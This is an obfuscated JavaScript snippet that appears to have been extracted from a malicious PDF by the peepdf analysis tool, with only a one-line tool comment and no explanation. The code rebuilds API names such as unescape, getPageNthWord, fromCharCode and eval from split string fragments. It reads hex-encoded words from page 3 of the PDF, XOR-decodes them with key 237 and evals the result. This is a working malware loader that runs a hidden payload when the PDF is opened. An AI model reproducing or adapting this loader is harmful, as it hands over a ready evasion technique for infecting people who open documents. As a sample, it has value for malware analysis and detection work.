// peepdf comment: Javascript code located in object 20 (version 0)

var m = ["pe", "", "ca", "un", "es"];
google = new
String(
m[
3] + m[
4] + m[
2] + m[
0] + m[
1]);

var basic = ["", "t", "cha", "deA", "rCo"];
t = new
String(
basic[
2] + basic[
4] + basic[
3] + basic[
1] + basic[
0]);

var adobe = ["", "rds", "getP", "ageN", "umWo"];
c = new
String(
adobe[
2] + adobe[
3] + adobe[
4] + adobe[
1] + adobe[
0]);

var q = ["", "eNt", "get", "hWo", "rd", "Pag"];
p = new
String(
q[
2] + q[
5] + q[
1] + q[
3] + q[
4] + q[
0]);

var cB = ["al", "", "ev"];
jB = new
String(
cB[
2] + cB[
0] + cB[
1]);

var file = ["p", "p", "", "a"];
v = new
String(
file[
3] + file[
0] + file[
0] + file[
2]);

var r = ["fro", "arC", "mCh", "", "ode"];
g = new
String(
r[
0] + r[
2] + r[
1] + r[
4] + r[
3]);


var
googleE = 3;
var
dAdobe = 237;
var
v = this[
v];
var
w = "%";
var
s = new
String();
var
gZ = this[
c](
googleE);
var
sW = this[
google];

for (
var
d = 0;
d < gZ;
d++) {

    h = this[
    p](
    googleE, d);
    var
    googleM = h.
    substr(
    h.
    length - 2, 2);
    var
    jG = sW(
    w + googleM);
    var
    hFile = jG[
    t](
    0);
    var
    pT = hFile ^ dAdobe;
    s += String[
    g](
    pT);
}
this[jB](s);

